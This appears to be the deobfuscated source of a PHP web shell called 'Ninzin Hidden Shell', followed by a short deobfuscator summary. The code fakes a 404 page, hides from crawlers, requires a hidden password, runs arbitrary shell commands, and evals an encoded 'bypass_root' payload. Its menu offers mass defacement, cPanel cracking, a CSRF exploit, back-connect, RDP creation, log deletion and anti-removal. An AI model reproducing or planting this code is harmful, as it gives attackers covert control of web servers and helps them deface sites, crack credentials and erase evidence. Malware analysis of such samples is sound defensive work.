fileperms($file)), -4); return $izin; } goto ScuEY; E5N6B: $ifi = "i" . "s_fi" . "le"; goto o5GuK; gQReF: if ($isw($euybrekw)) { echo "<font color="green">"; } elseif (!$isr($euybrekw)) { echo "<font color="red">"; } goto e5iX1; DvHE_: $ird = "is" . "_rea" . "da" . "ble"; goto mCni8; UeoyL: echo "<a class="destroy_table" href="?path=" . $lokasi . "&antikillshell=headshoot"><i class="fas fa-lock"></i> Anti Delete Shell</a>"; goto zmjIK; m7OOJ: echo "PHP Version : <font color='gold'>" . @phpversion() . "</font><br>"; goto BHQD_; aLxFY: $fnct = "fu" . "nc" . "tion" . "_exi" . "sts"; goto RyRkz; uXLCq: if (function_exists("curl_init")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto JwZiV; zZT6g: $scd = "sc" . "a" . "nd" . "ir"; goto rTGrb; r3ubz: if (file_exists("/usr/bin/wget")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto K15ms; gQcC8: $lokasinya = @scandir($lokasi); goto Jketo; vesdy: ini_set("display_errors", 1); goto z5F0D; A0cMJ: function exe($cmd) { if (function_exists("system")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("exec")) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists("passthru")) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("shell_exec")) { $buff = @shell_exec($cmd); return $buff; } } goto usZaD; jEwWG: $bypass_root = "wIAonkAOTU3sK/T1OwnOzB0yvqYnjzbaAgtzpKswuoLZ091WZznmf+5ZzgEFHOO8XAddEM9XXnYtb28++Ti8N+LaBWAYYjuSyeBK75j5B3CzT8fPum7ifbE2nPDSTXxBnoZBtFJL5gU0bcSXBWpKgqav7Sk+Yy+4KMujVssoQEMFmJ5mrJgziyvLYEGmuDKoEiC5ph8+of5RouQwhc0CiP57/VGwO3pe1skAuYEWU8qRgiGjycGktzIADj5F2RKBV+EfzXZaegwelAl6jwwbLE25Ud47MKAYToRLxlOVdONiyAgy3KeID9urJKTThctVtIgR6U9hR0TYrEkDajp0CnE6CNxlv4MkN0b86ENWQM6NE0CnGRtUQZhPIMcD2PRWV9gd3FxPGZPmecONVdO90byIAM3DBPD+uE5Gv9iy3DE4YmbsWGWTXvOlzBaiy7/+/Ql8N/bnaOl9I3vg8RUuJBSN4nZzCb2WI2ClmsuoPj5tJI8wd81bZkdpiwh024XXOMtxeViUE7KkRyK9VtuAUM6IL7OUNFelpcenRSMWUB+dh99zHECfXNORcU5SBmGMyF31BwH1BU37KrTUjcaPvpXKjraKm+e5GohbQIpOadpcdYWcqPAsZu4MXqzKrhq0ZVfTn0Q6iOgU7MwMZ1YQVHhjLsbgVwRYmXKyFm2nAFKgF11GKadmE2JfkPjFcQqcZ6U6wZDfW8pmlsTxnr1qnru93Ml+ouX/z4FLEHlz/7UYtJacTn2eaRvGzdckuzcOWL+I3z9y4I7qJniJCBjte+5HCZrhhPKxMTU2BaTg6ae/VFzI0qdXz1IW6IyxecB77ucJ56SprycQ+ipARtdn0nrLvz4bW+hxsreetEZeC+FPwti7sjR="; goto MVaRk; dOhM1: echo "<a class="destroy_table" href="?path=" . $lokasi . "&zoneh=headshoot"><i class="fas fa-theater-masks"></i> Zone-H</a>"; goto UHequ; SfLkK: echo "<div class="d-flex justify-content-center flex-wrap" align="center">"; goto ROUPh; qMfEO: echo "<a class="destroy_table" href="?path=" . $lokasi . "&createrdp=headshoot"><i class="fas fa-laptop-house"></i> Create Rdp</a>"; goto LSJjQ; fqj3p: if (file_exists("/usr/bin/perl")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto kyL3_; kdzPb: echo "<a class="destroy_table" href="?path=" . $lokasi . "&about=headshoot"><i class="fas fa-info"></i> About Me</a>"; goto mzgWT; fSh9Y: echo "</td></tr><tr><td>"; goto B1oFD; mzgWT: echo "<a class="destroy_table" href="?path=" . $lokasi . "&kill=headshoot"><i class="fas fa-skull"></i> Remove Shell</a>"; goto h8OHw; kyhLX: function gor($fl) { $a = "fun" . "cti" . "on_" . "exis" . "ts"; $b = "po" . "s" . "ix_" . "get" . "pwu" . "id"; $c = "fi" . "le" . "o" . "wn" . "er"; if ($a($b)) { if (!$a($c)) { return "?"; } $d = $b($c($fl)); if (empty($d)) { $e = $c($fl); if (empty($e)) { return "?"; } else { return $e; } } else { return $d["name"]; } } elseif ($a($c)) { return $c($fl); } else { return "?"; } } goto uW31K; hElda: function ambilKata($param, $kata1, $kata2) { if (strpos($param, $kata1) === FALSE) { return FALSE; } if (strpos($param, $kata2) === FALSE) { return FALSE; } $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } goto OdrQY; u2Drw: echo "<a class="destroy_table" href="?path=" . $lokasi . "&phpmailer=headshoot"><i class="fas fa-envelope"></i> Mailer </a>"; goto z1jI2; pWNY4: $sps = "st" . "rp" . "os"; goto zYney; Tudk2: echo "<tr>"; goto xnKOj; K15ms: echo " | Perl : "; goto fqj3p; zYney: $mkd = "m" . "kd" . "ir"; goto Frj1p; iYqNm: function cekfile($file) { return "<i class="fa fa-file" style="color: #d6d4ce"></i> "; } goto aPXjj; V3Qkr: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "<a href="?path=/">/</a>"; continue; } if ($lok == '') { continue; } echo "<a href="?path="; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $lok . "</a>/"; } goto fSh9Y; aPXjj: function filedate($file) { return date("F d Y g:i:s", filemtime($file)); } goto vKzed; xO4gP: author(); goto M172M; wm8VQ: $spr = "sp" . "ri" . "ntf"; goto GB8gY; BHQD_: echo "Disable Function : " . $disf . "</font><br>"; goto PkrsF; FrfAB: $ulk = "un" . "li" . "nk"; goto E5N6B; y0HyE: header("X-XSS-Protection: 0"); goto vesdy; tl8xe: function cekdir() { if (isset($_GET["path"])) { $lokasi = $_GET["path"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto UYsIL; kyL3_: echo " | Python : "; goto FI5oJ; Tk20e: echo "Total HDD : <font color='gold'>" . $total . " </font>/ Free: <font color='gold'>" . $freespace . " </font><br>"; goto Ai93F; ZjnKZ: $idi = "i" . "s_d" . "ir"; goto FrfAB; dL1gv: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto ZtTTW; Lu2xc: foreach ($lokasinya as $dir) { $euybre = $lokasi . "/" . $dir; $euybre = $srl("//", "/", $euybre); if (!$idi($euybre) || $dir == "." || $dir == "..") { continue; } echo "<tr>"; echo "<td><i class='fa fa-folder' style='color: #ffe9a2'></i> <a href="?path=" . $euybre . "">" . $dir . "</a></td>\xa <td><center>--</center></td>\xa <td><center>" . fdt($euybre) . "</center></td>\xa\x9<td><center>" . gor($euybre) . " / " . ggr($euybre) . "</center></td>
\x9<td><center>"; if ($isw($euybre)) { echo "<font color="green">"; } elseif (!$isr($euybre)) { echo "<font color="red">"; } echo statusnya($euybre); if ($isw($euybre) || !$isr($euybre)) { echo "</font>"; } echo "</center></td>
\x9<td><center><form method="POST" action="?pilihan&path={$lokasi}">
<input type="hidden" name="type" value="dir">\xa\x9<input type="hidden" name="name" value="{$dir}">
<input type="hidden" name="path" value="{$lokasi}/{$dir}">\xa <button type='submit' class='btf' name='pilih' value='gantinama'><i class='fa fa-pen' style='color: #fff'></i></button>
\x9<button type='submit' class='btf' name='pilih' value='ubahtanggal'><i class='fa fa-calendar' style='color: #fff'></i></button>\xa <button type='submit' class='btf' name='pilih' value='ubahmod'><i class='fa fa-cogs' style='color: #fff'></i></button>\xa\x9<button type='submit' class='btf' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #fff'></i></button>\xa\x9</form></center></td>
</tr>"; } goto kk5vw; e5iX1: echo statusnya($euybrekw); goto y1wXQ; wtNyg: $igt = "in" . "i_g" . "et"; goto aLxFY; y97T_: echo "</tr></td></table></table>"; goto xO4gP; fn_SB: function hdd($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto A0cMJ; K59SJ: echo " | Java : "; goto oT752; XZTh7: if (function_exists("mysql_connect")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto t6Qj9; Hfsd7: $fgt = "f" . "ile_g" . "et_c" . "onten" . "ts"; goto Sy2Nn; dHFJs: echo "<a class="destroy_table" href="?path=" . $lokasi . "&backconnect=headshoot"><i class="fas fa-network-wired"></i> Network</a>"; goto qMfEO; E0FxW: $ocd = "oc" . "td" . "ec"; goto NdWei; qVBBG: function red($text) { echo "<center><font color='red'>" . $text . "</center></font>"; } goto X_Ch1; NTU1c: $used = "{$total} - {$freespace}"; goto eZqHv; z5F0D: ini_set("display_startup_errors", 1); goto MQrxV; AyolC: error_reporting(E_ALL); goto nwKbR; LpJr3: echo "</table><br>"; goto VvLMe; MQrxV: ob_start(); goto AyolC; Frj1p: $disfunc = @ini_get("disable_functions"); goto T1l3Y; mvAZG: if (isset($_REQUEST["logout"])) { session_destroy(); echo "<script>window.location='?'</script>"; } goto xxh4f; LSJjQ: echo "<a class="destroy_table" href="?path=" . $lokasi . "&hasgen=headshoot"><i class="fas fa-cash-register"></i> Hash Generator</a>"; goto dOhM1; kk5vw: echo "<tr class="first"><td></td><td></td><td></td><td></td><td></td><td></td></tr>"; goto H5oCk; H5oCk: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}/{$file}")) { continue; } $size = filesize("{$lokasi}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>\xa<td>" . cekfile($lokasi . "/" . $file) . "<a href="?fileloc={$lokasi}/{$file}&path={$lokasi}">{$file}</a></td>\xa<td><center>" . $size . "</center></td>
<td><center>" . filedate($lokasi . "/" . $file) . "</center></td>\xa<td><center>" . gor($euybre) . " / " . ggr($euybre) . "</center></td>\xa<td><center>"; if (is_writable("{$lokasi}/{$file}")) { echo "<font color="green">"; } elseif (!is_readable("{$lokasi}/{$file}")) { echo "<font color="red">"; } echo statusnya("{$lokasi}/{$file}"); if (is_writable("{$lokasi}/{$file}") || !is_readable("{$lokasi}/{$file}")) { echo "</font>"; } echo "</center></td><td><center>
<form method="post" action="?pilihan&path={$lokasi}">
<button type='submit' class='btf' name='pilih' value='edit'><i class='fa fa-edit' style='color: #fff'></i></button>\xa<button type='submit' class='btf' name='pilih' value='gantinama'><i class='fas fa-pen' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='ubahtanggal'><i class='fa fa-calendar' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='ubahmod'><i class='fas fa-cogs' style='color: #fff'></i></button>\xa<button type='submit' class='btf' name='pilih' value='dunlut'><i class='fa fa-down" . "load' style='color: #fff'></i></button>\xa<button type='submit' class='btf' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #fff'></i></button>"; if (class_exists("ZipArchive")) { echo "<button type='submit' class='btf' name='pilih' value='unzip'><i class='fas fa-file-archive' style='color: #fff'></i></button>"; } echo "\xa<input type="hidden" name="type" value="file">\xa<input type="hidden" name="name" value="{$file}">\xa<input type="hidden" name="path" value="{$lokasi}/{$file}">\xa</form></center></td>
</tr>"; } goto y97T_; rhtoy: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "." || $item === "..") { continue; } $path = $dir . "/" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto zKur1; hJYjD: echo "User : <font color='gold'>" . @get_current_user() . " </font>( <font color='gold'>" . @getmyuid() . "</font>) Group: <font color='gold'>" . $group . " </font>( <font color='gold'>" . @getmygid() . "</font>)<br>"; goto Tk20e; t6Qj9: echo " | cURL : "; goto uXLCq; mCni8: $isr = "is_" . "re" . "adab" . "le"; goto IreJh; NdWei: $isw = "i" . "s_wr" . "itab" . "le"; goto RYW2E; z1jI2: echo "<a class="destroy_table" href="?path=" . $lokasi . "&csrfup=headshoot"><i class="fas fa-file-import"></i> CSRF Exploit</a>"; goto Dtjhn; ijH8y: echo "<a class="destroy_table" href="?path=" . $lokasi . "&upload=headshoot"><i class="fas fa-cloud-upload-alt"></i> Upload File</a>"; goto cMCJ5; oT752: if (file_exists("/usr/bin/java")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto dL1gv; PkrsF: echo "MySQL : "; goto XZTh7; Jketo: echo "<br>Directory (" . cekwrite($lokasi) . ") : "; goto V3Qkr; hAab2: function green($text) { echo "<center><font color='green'>" . $text . "</center></font>"; } goto qVBBG; H8RuD: $bsn = "ba" . "se" . "na" . "me"; goto KMLsg; ZtTTW: if (isset($_GET["path"])) { $lokasi = $_GET["path"]; $lokdua = $_GET["path"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto EgDii; nwKbR: echo "\xa<!DOCTYPE html>\xa<html>
<head>\xa <title>404 Not Found</title>
<meta name='author' content='Ninzinjp'>
<meta name='viewport' content='width=device-width, initial-scale=1' />
<meta name='description' content='ninzin shell bypass !'>\xa <meta property='og:description' content='ninzin shell bypass !'>
<meta property='og:image' content='https://i.ibb.co/QHLs3Tt/yunjin.jpg'>
<link rel='icon' href='https://i.ibb.co/QHLs3Tt/yunjin.jpg'>
<link rel='shortcut icon' href='https://i.ibb.co/QHLs3Tt/yunjin.jpg'>
<meta name='robots' content='noindex'>
<meta name='googlebot' content='noindex'>
<meta name='theme-color' content='#1f1f1f'>
</head>
<body bgcolor='#1f1f1f' text='#ffffff'>\xa<link href='' rel='stylesheet' type='text/css'>\xa<link href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css' rel='stylesheet'>\xa<style>\xa @import url('https://fonts.googleapis.com/css?family=Dosis');
@import url('https://fonts.googleapis.com/css?family=Trade+Winds');
@import url('https://fonts.googleapis.com/css?family=Bungee+Outline');
@import url('https://fonts.googleapis.com/css?family=Silkscreen');
@import url('https://fonts.googleapis.com/css?family=Bungee');\xabody {
font-family: 'Dosis', cursive;
text-shadow:0px 0px 1px #757575;\xa}\xa
body::-webkit-scrollbar {
width: 12px;\xa
}
\xabody::-webkit-scrollbar-track {\xa background: #1f1f1f;\xa}\xa
body::-webkit-scrollbar-thumb {
background-color: #1f1f1f;\xa border: 3px solid gray;
}\xa\xa#content tr:hover {\xa background-color: #636263;\xa text-shadow:0px 0px 10px #fff;\xa}\xa\xa#content .first {\xa background-color: #25383C;\xa}
\xa#content .first:hover {\xa background-color: #25383C
text-shadow:0px 0px 1px #757575;
}
\xatable {\xa border: 1px #000000 dotted;\xa table-layout: fixed;
word-break: break-all;
}
\xatextarea {
max-width: 95%;
max-height: 100%;
resize: none;\xa outline: none;\xa overflow: auto;\xa background: transparent;
color: #fff;\xa}\xa
textarea::-webkit-scrollbar {
width: 12px;\xa}\xa
textarea::-webkit-scrollbar-track {
background: #1f1f1f;\xa}\xa\xatextarea::-webkit-scrollbar-thumb {
background-color: #1f1f1f;
border: 3px solid gray;\xa}
\xaa {\xa color: #ffffff;\xa text-decoration: none;
}
\xaa:hover {
color: gold;
text-shadow:0px 0px 10px #ffffff;\xa}
\xainput,select,textarea {
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
.gas {
background-color: #1f1f1f;
color: #ffffff;
cursor: pointer;\xa}\xa\xa.btf {
background: transparent;\xa\x9border: 1px #fff solid;\xa cursor: pointer;\xa}\xa
select {
background-color: transparent;
color: #ffffff;
}\xa
select:after {\xa cursor: pointer;\xa}
.linka {\xa background-color: transparent;
color: #ffffff;\xa}
.up {
background-color: transparent;
color: #fff;
}\xa\xa.destroy_table {;
background:transparent;\xa position:relative;
padding:3px;\xa margin:0px;\xa border:1px solid white;
font-family:Dosis;
display:inline-block;
cursor:pointer;
color:white;
font-size:17px;\xa font-weight:bold;\xa padding:3px 20px;\xa text-decoration:white;\xa text-shadow:0px 0px 0px #ff0505;\xa}
\xaoption {\xa background-color: #1f1f1f;
}\xa
::-webkit-file-upload-button {
background: transparent;\xa color: #fff;\xa border-color: #fff;\xa cursor: pointer;
}
</style>
<script>\xafunction setfilename(val)\xa {
filename = val.split('\').pop().split('/').pop();\xa //filename = filename.substring(0, filename.lastIndexOf('.'));
document.getElementById('namanya').value = filename;\xa }
\xaasync function loadFile(file) {
let text = await file.text();\xa document.getElementById('bepasdata').innerHTML = text;\xa}\xa</script>\xa<center>
<font face='Trade Winds' size='6'>Ninzin Hidden Shell</font></center>\xa<img src='https://i.ibb.co/x2Wz44j/ninzinjp.jpg' style='position: absolute; top: 50px; right: 20px; border-radius: 50%; border-color: black;' width='210' border='2' height='210'>\xa<table width='100%' border='0' cellpadding='3' cellspacing='1' align='center'>\xa<tr><td>"; goto jEwWG; X_Ch1: $group = "?"; goto AnxrV; YSYov: echo "Web Server : <font color='gold'>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; goto NkEgn; iXP_6: echo "</div>"; goto CxEzp; GB8gY: $fp = "fil" . "epe" . "rms"; goto a6132; d5Nl3: echo "<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Last Modified</center></td>
<td><center>Owner / Group</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>\xa</tr>"; goto Tudk2; EgDii: $lokasi = str_replace("\", "/", $lokasi); goto agdM1; S5rvq: function fdt($fl) { $a = "da" . "te"; $b = "fil" . "emt" . "ime"; return $a("F d Y H:i:s", $b($fl)); } goto kyhLX; E8VnX: function ipserv() { if (empty($_SERVER["SERVER_ADDR"])) { return gethostbyname($_SERVER["SERVER_NAME"]); if (empty(gethostbyname($_SERVER["SERVER_NAME"]))) { return $_SERVER["SERVER_NAME"]; } } else { return $_SERVER["SERVER_ADDR"]; } } goto iYqNm; usZaD: function author() { echo "<center><br>Made with \342\x99\xa5\xef\xb8\217 From Ninzin</center>"; die; } goto S5rvq; O2SSS: if (!isset($_SESSION[md5($_SERVER["HTTP_HOST"])])) { if (empty($password) || isset($_POST["password"]) && base64_encode($_POST["password"]) == $password) { $_SESSION[md5($_SERVER["HTTP_HOST"])] = true; } else { login_shell(); } } goto y0HyE; cMCJ5: echo "<a class="destroy_table" href="?path=" . $lokasi . "&massdeface=headshoot"><i class="fas fa-poo-storm"></i> Mass Deface</a>"; goto NJYLE; EYdlW: function owner($file) { if (function_exists("posix_getpwuid")) { $tod = @posix_getpwuid(fileowner($file)); return "<center>" . $tod["name"] . "</center>"; } else { return "<center>" . fileowner($file) . "</center>"; } } goto hElda; xxh4f: $password = "eHpvdXJ0MTIz"; goto tyq0E; y1wXQ: if ($isw($euybrekw) || !$isr($euybrekw)) { echo "</font>"; } goto lm9_W; NkEgn: echo "System : <font color='gold'>" . php_uname() . "</font><br>"; goto hJYjD; UHequ: echo "<a class="destroy_table" href="?path=" . $lokasi . "&adminer=headshoot"><i class="fas fa-database"></i> Adminer</a>"; goto u2Drw; tyq0E: function login_shell() { ?>
<!doctypehtml><html><head><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><style>input{margin:0;background-color:#fff;border:1px solid #fff;text-align:center}</style><br><br><br><br><br><form method="post"><br><br><center><input autocomplete="off"name="password"type="password"></form><?php die; } goto O2SSS; bDGIE: error_reporting(0); goto aZYKL; WhxNt: echo "</div>"; goto iXP_6; T1l3Y: if (empty($disfunc)) { $disf = "<font color='gold'>NONE</font>"; } else { $disf = "<font color='red'>" . $disfunc . "</font>"; } goto fn_SB; aZYKL: header("HTTP/1.0 404 Not Found", true, 404); goto hPJ3K; AjOag: $fpt = "fi" . "le_p" . "ut_co" . "nte" . "nts"; goto Hfsd7; qC3XU: echo "</tr>"; goto Lu2xc; Ai93F: echo "Time : <font color='gold'>" . date("d M Y H:i:s", time()) . " </font><br>"; goto m7OOJ; m6yLj: echo "<td><i class='fa fa-folder' style='color: #ffe9a2'></i> <a href="?path=" . $euybrekw . "">..</a></td>\xa<td><center>--</center></td>
<td><center>" . fdt($euybrekw) . "</center></td>
<td><center>" . gor($euybrekw) . " / " . ggr($euybrekw) . "</center></td>
<td><center>"; goto gQReF; xnKOj: $euybrekw = $srl($bsn($lokasi), '', $lokasi); goto zRnLc; CYemH: $rpt = "re" . "al" . "pa" . "th"; goto H8RuD; agdM1: $lokasis = explode("/", $lokasi); goto gQcC8; y2_cD: echo "<a class="destroy_table" href="?path=" . $lokasi . "&moretools=headshoot"><i class="fas fa-tools"></i> More Tools</a>"; goto kdzPb; AnxrV: $freespace = hdd(disk_free_space("/")); goto C6XDb; rTGrb: $fxt = "fi" . "le_" . "exis" . "ts"; goto ZjnKZ; zKur1: function dunlut($file) { if (!is_readable($file)) { red("Cannot Download File / Unreadable File !"); die; } @ob_clean(); header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($file)); readfile($file); die; } goto EYdlW; MVaRk: eval(gzinflate(base64_decode(str_rot13($bypass_root)))); goto AjOag; h8OHw: echo "<a class="destroy_table" href="?path=" . $lokasi . "&logout=headshoot"><i class="fas fa-sign-out-alt"></i> Logout</a>"; goto WhxNt; ROUPh: echo " <a class="destroy_table" href="" . $_SERVER["SCRIPT_NAME"] . ""><i class="fas fa-home"></i> Home</a>"; goto Du9kO; yuM3I: if (!empty($_SERVER["HTTP_USER_AGENT"])) { $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl"); if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) { header("HTTP/1.0 404 Not Found"); die; } } goto mvAZG; UYsIL: function cekroot() { if (is_writable($_SERVER["DOCUMENT_ROOT"])) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto rhtoy; Njo2H: echo "<a class="destroy_table" href="?path=" . $lokasi . "&delete_logs=headshoot"><i class="fas fa-trash"></i></i> Delete Logs</a>"; goto y2_cD; fHa7N: function ekse($komend, $lokasi) { if (!function_exists("proc_open")) { die("proc_open function disabled !"); } elseif (!function_exists("base64_decode")) { die("base64_decode function disabled !"); } $komen = base64_decode(base64_decode(base64_decode($komend))); if (strpos($komend, "2>&1") === false) { $komen = base64_decode(base64_decode(base64_decode($komend))) . " 2>&1"; } $tod = @proc_open($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pipes, $lokasi); echo "<textarea rows='25' cols='100'>" . htmlspecialchars(stream_get_contents($pipes[1])) . "</textarea><br><br>"; } goto E8VnX; SqmYD: echo "<a class="destroy_table" href="?path=" . $lokasi . "&cpcrack=headshoot"><i class="fas fa-key"></i> Cpanel Crack</a>"; goto dHFJs; RYW2E: $idr = "i" . "s_d" . "ir"; goto DvHE_; hPJ3K: session_start(); goto yuM3I; ScuEY: ?>
Function Calls
None |
Stats
MD5 | 4ed7ee7e327f637348282154bc9a5299 |
Eval Count | 0 |
Decode Time | 142 ms |